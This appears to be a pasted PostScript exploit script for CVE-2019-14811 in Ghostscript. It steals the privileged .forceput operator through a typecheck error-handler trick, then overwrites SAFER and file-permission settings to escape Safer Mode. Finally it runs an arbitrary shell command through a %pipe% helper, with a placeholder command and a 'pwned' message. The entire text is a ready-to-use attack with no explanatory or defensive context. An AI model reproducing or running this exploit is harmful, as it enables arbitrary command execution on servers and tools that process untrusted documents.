Untitled

a guest
Sep 21st, 2019
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/exploit {{
/println {{ (\\n) exch print print }} bind executeonly def
/info {{ ([*] ) print println }} bind executeonly def
/success {{ ([+] ) print println }} bind executeonly def
/fail {{ ([-] ) print println stop }} bind executeonly def

/MaxFileSize 16#10000 def
/readfile {{
(r) file
dup MaxFileSize string readstring pop
exch closefile
}} bind executeonly def

/osexec {{
(%pipe%) exch concatstrings readfile
}} bind executeonly def

(=============================================================================)
(= CVE-2019-14811 =)
(=============================================================================)
println println println

(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
/.forceput null def
systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
/typecheckcount 0 def
/&typecheck errordict /typecheck get def
errordict /typecheck {{
/typecheckcount typecheckcount 1 add def
typecheckcount 2 eq {{
1 index 2 get 8 get
/.forceput exch store
}} if
}} put
null .pdf_hook_DSC_Creator clear
errordict /typecheck /&typecheck load put
[
/&typecheck
/typecheckcount
/.pdf_hook_DSC_Creator
] {{ currentdict exch undef }} forall
(A candidate for .forceput operator found!) success

(Attempting sanity check with the candidate for .forceput operator...) info
<< /overwritten false >> readonly
begin
currentdict /overwritten true .forceput
overwritten not {{
/.forceput where {{ /.forceput undef }} if
}} if
end
currentdict /.forceput known not {{
(.forceput operator could not found...) fail
}} if
(Successfully got .forceput operator!) success

(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
save restore

SAFER {{
(Could not escape from Safer Mode.) fail
}} bind executeonly if
(Successfully escaped from Safer Mode!) success

(Executing a shell command...) info
({cmd}) osexec pop
% (touch /tmp/pwned) osexec pop
(PS: I pwned you <3) success
}} def
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%